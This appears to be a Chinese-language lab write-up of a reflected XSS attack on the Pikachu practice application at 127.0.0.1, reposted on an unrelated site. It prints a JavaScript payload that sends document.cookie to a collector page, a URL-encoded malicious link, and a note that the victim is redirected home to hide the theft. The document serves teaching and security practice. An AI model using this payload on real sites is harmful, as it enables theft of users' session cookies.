XSS攻击:获取用户的cookie(get方式) |
您所在的位置:网站首页 › cookie欺骗的过程 › XSS攻击:获取用户的cookie(get方式) |
关于XSS攻击是什么,想必大家都知道了,今天围绕百度随便找的一张流程图来完成一个获取用户的cookie的XSS实验。 0x2 找到漏洞点,制作一个危险的url 让前端插入的js是: document.location = 'http://127.0.0.1/pika/pkxss/xcookie/cookie.php?cookie=' + document.cookie; cookie.php后面讲到攻击者的后台会把代码贴出来。 这是正常的url: http://127.0.0.1/pika/vul/xss/xss_reflected_get.php?message=kobe&submit=submit 用上面的js结合正常的url制作危险的url: http://127.0.0.1/pika/vul/xss/xss_reflected_get.php?message=&submit=submit 0x3一般攻击者发送给用户的都是经过url编码的链接:用户很容易被以xxx(127.0.0.1)开头的域名链接所欺骗 http://127.0.0.1/pika/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F127.0.0.1%2Fpika%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit 0x4 web应用对攻击者的js做出回应 上面那个js脚本不仅获得了用户的cookie经过接受接口一顿操作后header("Location:http://127.0.0.1/pika/index.php"); 重定向到了网站主页,让用户发现不了有什么异常。 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |